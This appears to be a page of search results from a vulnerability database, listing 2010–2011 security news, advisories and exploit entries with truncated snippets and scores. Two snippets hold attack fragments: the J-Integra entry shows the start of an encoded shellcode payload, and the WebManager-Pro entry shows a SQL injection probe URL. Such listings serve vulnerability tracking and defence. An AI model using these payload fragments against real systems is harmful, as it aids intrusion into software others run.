1529 matches found

The Hacker News
added 2011/03/04 4:38 a.m., 16 views

GnackTrackR6 Released, available for Download!

GnackTrackR6 Released, available for Download! GnackTrack is a Live and installable Linux distribution designed for Penetration Testing and is based on Ubuntu. Although this sounds like BackTrack, it is most certainly not; it's very similar but based on the much loved GNOME! GnackTrackR6 has ju...

6.7 AI score
Exploits 0

Packet Storm
added 2011/02/23 12:0 a.m., 24 views

Red Hat Enterprise Linux seunshare Unsafe Implementation

Developers should not rely on the stickiness of /tmp on Red Hat Linux
Recent versions of Red Hat Enterprise Linux and Fedora provide seunshare, a setuid root utility from policycore-utils intended to make new filesystem...

Exploits 0

ThreatPost
added 2011/01/07 3:15 p.m., 11 views

Mac App Store Safeguards Bypassed, Opening Up Pirated Apps

Just a day after Apple introduced its Mac App Store, some users already have found a way around the DRM system designed to ensure that they have paid for the apps that they’re using. The technique seems to work only on apps that don’t correctly implement the method for checking the App Store...

0.2 AI score
Exploits 0, References 2

ThreatPost
added 2010/12/29 3:47 p.m., 6 views

Exploit Kits Employing Obfuscation to Prevent Analysis

The creators of the Phoenix exploit kit have begun using obfuscation and other techniques to prevent security researchers and others from reverse-engineering the installation process for the kit, adopting a tactic that has become increasingly popular among attackers recently. The Phoenix exploit...

0.3 AI score
Exploits 0, References 1

The Hacker News
added 2010/12/16 1:48 a.m., 8 views

Mantra: A Browser based Security Framework!

Mantra is a dream that came true for the author. It is a collection of free and open source tools integrated into a web browser – Firefox, which can become handy for students, penetration testers, web application developers, security professionals etc. It is portable, ready-to-run, compact and...

7.2 AI score
Exploits 0

ThreatPost
added 2010/12/06 7:38 p.m., 7 views

Android Update Adds Protection From Mobile Clickjacking

Google released the latest version of its Android mobile operating system on Monday, adding security features that it says will make it tougher for mobile device users to be subjected to “clickjacking” attacks that trick them into clicking on hidden or disguised user interface elements. The compa...

0.8 AI score
Exploits 0, References 8

ThreatPost
added 2010/12/06 7:38 p.m., 11 views

Android Update Adds Protections For Mobile Clickjacking

Google released the latest version of its Android mobile operating system on Monday, adding security features that it says will make it tougher for mobile device users to be subjected to “clickjacking” attacks that trick them into clicking on hidden or disguised user interface elements. The compa...

1.7 AI score
Exploits 0, References 2

Packet Storm
added 2010/12/02 12:0 a.m., 26 views

J-Integra 2.11 Remote Code Execution

esp = String100, "B" calc = unescape"%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%48%49" & unescape"%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%68" & unescape"%58%50%30%42%31%42%41%6b%41%41%78%32%41%42%32%42" & unescape"%41%30%42%41%41%58%38%41%42%50%75%59%79%39%6c%4a" &...

Exploits 0

securityvulns
added 2010/11/18 12:0 a.m., 44 views

Eclipse IDE | Help Server Local Cross Site Scripting (XSS) Vulnerability

Eclipse IDE | Help Server Local Cross Site Scripting XSS Vulnerability
1. OVERVIEW
The Help Content web application of Eclipse IDE was vulnerable to Cross Site Scripting XSS...

6.3 AI score
Exploits 0

Packet Storm
added 2010/11/16 12:0 a.m., 32 views

Eclipse IDE Cross Site Scripting

Eclipse IDE | Help Server Local Cross Site Scripting XSS Vulnerability
1. OVERVIEW
The Help Content web application of Eclipse IDE was vulnerable to Cross Site Scripting XSS...

7.4 AI score
Exploits 0

The Hacker News
added 2010/11/11 12:49 a.m., 8 views

Watcher 1.4.1 - latest version download

"Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as...

6.7 AI score
Exploits 0

Fedora
added 2010/11/01 8:55 p.m., 54 views

[SECURITY] Fedora 12 Update: tomcat6-6.0.26-3.fc12

Tomcat is the servlet container that is used in the official Reference Implementation for the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed by Sun under the Java Community Process. Tomcat is developed in an open and participator...

6.4 CVSS, 2.8 AI score, 0.89573 EPSS
Exploits 7

The Hacker News
added 2010/10/31 1:47 a.m., 9 views

Popular Facebook Games Exposing User Data to Third Parties

Facebook privacy has been a recurring topic in the news. With the massive number of users on the site, the amount of personal data involved is enormous. Recently, it has been revealed that many popular third-party apps, mainly games like Farmville and Texas HoldEm Poker, are leaking the unique...

6.9 AI score
Exploits 0

The Hacker News
added 2010/10/30 12:40 a.m., 22 views

The Shellcoder's Handbook: 1st & 2nd Edition Download

Shellcoder's Programming Uncovered Kris Kaspersky ISBN-10: 193176946X Product Description How hackers, viruses, and worms attack computers from the Internet and exploit security holes in software is explained in this outline of antivirus software, patches, and firewalls that try in vain to...

7.7 AI score
Exploits 0

ThreatPost
added 2010/10/04 9:11 p.m., 12 views

Rethinking Stuxnet

It’s hard to think of a story in the last few years that has generated more hype, conjecture, posturing, hyperbole and misdirection than Stuxnet, with the possible exception of the Aurora attacks. The commentary and hype around Stuxnet has shifted and morphed over the last few months, and now it...

7 AI score
Exploits 0, References 2

Packet Storm
added 2010/10/04 12:0 a.m., 56 views

SmarterMail 7.x Cross Site Scripting

Source URL http://cloudscan.blogspot.com/2010/10/vendor-smartertoolscom-smartermail-7x.html Vendor: smartertools.com SmarterMail 7.x 7.2.3925 Date: 2010-10-01 Author : David Hoyt sqlhacker – Hoyt LLC Contact : [email protected] Home : http://cloudscan.me Dork : insite: SmarterMail Enterprise 7.1 B...

5 CVSS, 6.5 AI score, 0.0802 EPSS
Exploits 13

Packet Storm
added 2010/09/25 12:0 a.m., 16 views

CMS Mysite Cross Site Scripting / SQL Injection

Hello Full-Disclosure! I want to warn you about Full path disclosure, Cross-Site Scripting and SQL Injection vulnerabilities in CMS MYsite. It's Ukrainian commercial CMS. Full path disclosure WASC-13: http://site/portal/modules.php?name=Ads XSS WASC-08:...

0.5 AI score
Exploits 0

Tenable Nessus
added 2010/09/20 12:0 a.m., 21 views

openSUSE Security Update : MozillaFirefox (openSUSE-SU-2010:0632-1)

Mozilla Firefox was updated to version 3.6.10, fixing various bugs and security issues. Following security issues were fixed: MFSA 2010-49 / CVE-2010-3169: Mozilla developers identified and fixed several memory safety bugs in the browser engine used in Firefox and other Mozilla-based products. So...

9.3 CVSS, 9 AI score, 0.10225 EPSS
Exploits 2, References 18

Packet Storm
added 2010/09/03 12:0 a.m., 32 views

CMS WebManager-Pro SQL Injection

Hello Bugtraq! I want to warn you about SQL Injection and Redirector URL Redirector Abuse vulnerabilities in CMS WebManager-Pro SecurityVulns ID:11108. It's Ukrainian commercial CMS. SQL Injection: http://site/c.php?id=1%20and%20version=5 Redirector:...

0.1 AI score
Exploits 0

Atlassian
added 2010/07/13 11:26 a.m., 20 views

sudo is decorated with global decorator

The reasoning behind preventing theme developers from theming the admin areas was because if you don't know what you are doing then you can mess things up to such an extent that you are unable to use confluence. By decorating the sudo login pages using the global decorator it exposes the user to...

2.1 AI score
Exploits 0, Affected Software 1